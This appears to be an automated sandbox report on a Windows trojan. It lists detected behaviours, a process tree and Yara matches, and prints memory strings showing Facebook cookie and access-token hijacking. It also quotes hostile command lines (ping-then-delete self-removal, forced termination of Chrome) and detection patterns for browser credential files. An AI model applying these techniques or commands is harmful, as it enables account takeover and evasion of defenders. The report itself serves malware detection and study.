Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368 (renamed file extension from 25368 to exe)
Analysis ID:	385405
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
Infos:
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: 29389832E538957DC769CF709F80144A)

msiexec.exe (PID: 6488 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

26FF190E7AE0F7C7.exe (PID: 6676 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3 MD5: 29389832E538957DC769CF709F80144A)

1618257864703.exe (PID: 6876 cmdline: 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5880 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

26FF190E7AE0F7C7.exe (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3 MD5: 29389832E538957DC769CF709F80144A)

cmd.exe (PID: 6932 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6984 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 7040 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 7084 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 6736 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6832 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6572 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25a0000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.26c0000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.25a0000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
6.2.26FF190E7AE0F7C7.exe.26c0000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x26484:$x1: cmd /c ping 127.0.0.1 -n
7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fece4:$s2: \nss3.dll 0x247d58:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fed58:$s6: %s\Mozilla\Firefox\profiles.ini 0x247dd8:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Metadefender: Detection: 25%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%	Perma Link
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,		0_2_1001F780
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,		6_2_1001F780

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618257864703.exe, 0000000B.00000000.375331219.000000000040F000.00000002.00020000.sdmp, 1618257864703.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000015.00000000.408882795.000000000001C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI429C.tmp.3.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,		0_2_1001A1D0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,		6_2_1001A1D0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking:

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: unknown	DNS traffic detected: query: c431a802ff4a46b5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55BE681FC6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61d53b5a4bc1ab86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ed2feea30c3cc5d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: BDC347C728B2D94D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 55be681fc6760236.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bdc347c728b2d94d.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: C431A802FF4A46B5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9ED2FEEA30C3CC5D.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: back19e64ea00d6ecfe1.io replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84B5A35D6E5335EF.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 61D53B5A4BC1AB86.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 84b5a35d6e5335ef.com replaycode: Name error (3)

Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
